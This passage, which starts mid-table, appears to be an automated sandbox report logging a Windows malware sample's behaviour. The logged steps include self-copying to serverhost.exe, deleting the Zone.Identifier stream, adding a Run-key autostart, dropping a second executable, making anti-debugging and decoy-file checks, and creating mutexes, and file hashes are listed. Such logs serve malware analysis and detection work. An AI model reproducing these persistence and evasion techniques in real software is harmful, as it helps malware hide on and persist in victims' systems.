| Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x765e2fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineA, address_out = 0x765e98ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x765e395c |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = cos, address_out = 0x772e7400 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = sin, address_out = 0x772d41c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x772e7690 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MACA73F0A |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
|
499 |
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
| Command Line | "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:35 |
| Information | Value |
|---|---|
| PID | 0xae4 |
| Parent PID | 0xad0 (c:\users\bgc6u8~1\appdata\local\temp\42753.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AE8
0x
AEC
0x
AF0
0x
AF4
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 100.00 KB (102400 bytes) |
MD5:
d6c8126371d37ffe3100755db6aa22ed
SHA1: 294b381e200aa3f343989877c9ef5efdda25ca42 SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec |
|
|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 92.00 KB (94208 bytes) |
MD5:
2b8584cab96d20ee851054f9fedef7f3
SHA1: de72320cc8fc12f2e410afa07809b620f81066dc SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\email.doc | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\a\foobar.bmp | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe | type = size |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ | type = file_attributes |
|
1 | |
| Move | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | source_filename = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe |
|
1 | |
| Delete | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe:Zone.Identifier |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | os_pid = 0xaf8, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x76890000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76590000 |
|
2 | |
| Load | ntdll.dll | base_address = 0x772a0000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x76b40000 |
|
1 | |
| Load | winhttp.dll | base_address = 0x71a10000 |
|
7 | |
| Load | urlmon.dll | base_address = 0x76f00000 |
|
8 | |
| Load | wininet.dll | base_address = 0x77040000 |
|
8 | |
| Load | advapi32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x77140000 |
|
1 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x755b0000 |
|
1 | |
| Load | userenv.dll | base_address = 0x74af0000 |
|
1 | |
| Load | wtsapi32.dll | base_address = 0x74180000 |
|
1 | |
| Get Handle | c:\users\bgc6u8~1\appdata\local\temp\42753.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | c:\users\bgc6u8~1\appdata\local\temp\42753.exe | process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 259 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 260 |
|
2 | ||
| Get Address | c:\windows\system32\user32.dll | function = GetMessagePos, address_out = 0x768c6703 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x765e2fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineA, address_out = 0x765e98ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x765e395c |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = cos, address_out = 0x772e7400 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = sin, address_out = 0x772d41c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x772e7690 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Create Mapping | C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe | process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, desired_access = FILE_MAP_READ |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
2 | |
| Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| Get Time | type = Ticks, time = 85270 |
|
1 | |
| Get Time | type = Ticks, time = 86284 |
|
1 | |
| Get Time | type = Ticks, time = 87282 |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
2 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MACA73F0A |
|
1 | |
| Create | mutex_name = Global\I78B95E2E |
|
1 | |
| Create | mutex_name = Global\M78B95E2E |
|
1 | |
| Release | mutex_name = Global\I78B95E2E |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
|
499 |
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:54, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:31 |
| Information | Value |
|---|---|
| PID | 0xaf8 |
| Parent PID | 0xae4 (c:\users\bgc6u8~1\appdata\local\temp\42753.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AFC
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\email.doc | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\a\foobar.bmp | desired_access = GENERIC_READ |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | os_pid = 0xb04, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x76890000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76590000 |
|
2 | |
| Load | ntdll.dll | base_address = 0x772a0000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x76b40000 |
|
1 | |
| Load | winhttp.dll | base_address = 0x71a10000 |
|
7 | |
| Load | urlmon.dll | base_address = 0x76f00000 |
|
7 | |
| Load | wininet.dll | base_address = 0x77040000 |
|
7 | |
| Get Handle | c:\users\bgc6u8~1\appdata\local\temp\42753.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | c:\users\bgc6u8~1\appdata\local\temp\42753.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\user32.dll | function = GetMessagePos, address_out = 0x768c6703 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x765e2fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineA, address_out = 0x765e98ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x765e395c |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = cos, address_out = 0x772e7400 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = sin, address_out = 0x772d41c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x772e7690 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MA991ED3B |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
499 |
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:56, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:29 |
| Information | Value |
|---|---|
| PID | 0xb04 |
| Parent PID | 0xaf8 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B08
0x
B0C
0x
B10
0x
B14
0x
B1C
0x
B20
0x
B24
0x
B2C
0x
B34
0x
B38
0x
B3C
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe | 92.00 KB (94208 bytes) |
MD5:
2b8584cab96d20ee851054f9fedef7f3
SHA1: de72320cc8fc12f2e410afa07809b620f81066dc SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1 |
|
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | 64.00 KB (65536 bytes) |
MD5:
e56a6538abf1d60544ce14111c423323
SHA1: f57cc7b3be0d2cf0b65d0397e76c73717bd1a96b SHA256: 0341e7374090ca82b3ff7c1a6cbfd85ebc48be5ec3135aaf183c0c0c7da993da |
|
|
| c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\cookies\index.dat | 32.00 KB (32768 bytes) |
MD5:
e8289ca60a86329fef2726ababd2b99a
SHA1: a2567af5c9e4f7f9e9e08f5f8aec657a41692d4d SHA256: 33900323a9a4bdde6a22ee56a613f0dd67f275d3571321cdac54ea7321e244de |
|
|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat | 64.00 KB (65536 bytes) |
MD5:
4d32b3456316311c50d77f7a37556236
SHA1: 47f9117eb7cf12bd3c36295b8084e98d962b6861 SHA256: 4ff606ec32478199d9183c9ec73ed4d0787f52ecc6504b7ce2d5cdf3ded0a5a6 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\email.doc | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\a\foobar.bmp | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | type = size |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe | size = 94208 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | ||
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe | os_pid = 0xbdc, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x76890000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76590000 |
|
2 | |
| Load | ntdll.dll | base_address = 0x772a0000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x76b40000 |
|
1 | |
| Load | winhttp.dll | base_address = 0x71a10000 |
|
7 | |
| Load | urlmon.dll | base_address = 0x76f00000 |
|
8 | |
| Load | wininet.dll | base_address = 0x77040000 |
|
8 | |
| Load | advapi32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x77140000 |
|
1 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x755b0000 |
|
1 | |
| Load | userenv.dll | base_address = 0x74af0000 |
|
1 | |
| Load | wtsapi32.dll | base_address = 0x74180000 |
|
1 | |
| Get Handle | c:\users\bgc6u8~1\appdata\local\temp\42753.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | c:\users\bgc6u8~1\appdata\local\temp\42753.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
3 | ||
| Get Address | c:\windows\system32\user32.dll | function = GetMessagePos, address_out = 0x768c6703 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | ||
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x765e2fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCommandLineA, address_out = 0x765e98ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x765e395c |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = cos, address_out = 0x772e7400 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = sin, address_out = 0x772d41c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x772e7690 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Create Mapping | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
2 | |
| Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| Get Time | type = Ticks, time = 91853 |
|
1 | |
| Get Time | type = Ticks, time = 92867 |
|
1 | |
| Get Time | type = Ticks, time = 93865 |
|
1 | |
| Get Time | type = Ticks, time = 94864 |
|
1 | |
| Get Time | type = Ticks, time = 95862 |
|
1 | |
| Get Time | type = Ticks, time = 96861 |
|
1 | |
| Get Time | type = Ticks, time = 97859 |
|
1 | |
| Get Time | type = Ticks, time = 98857 |
|
1 | |
| Get Time | type = Ticks, time = 99856 |
|
1 | |
| Get Time | type = Ticks, time = 100901 |
|
1 | |
| Get Time | type = Ticks, time = 101119 |
|
1 | |
| Get Time | type = Ticks, time = 101915 |
|
1 | |
| Get Time | type = Ticks, time = 102945 |
|
1 | |
| Get Time | type = Ticks, time = 103927 |
|
1 | |
| Get Time | type = Ticks, time = 104926 |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
2 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MA991ED3B |
|
1 | |
| Create | mutex_name = Global\I78B95E2E |
|
1 | |
| Create | mutex_name = Global\M78B95E2E |
|
1 | |
| Release | mutex_name = Global\I78B95E2E |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
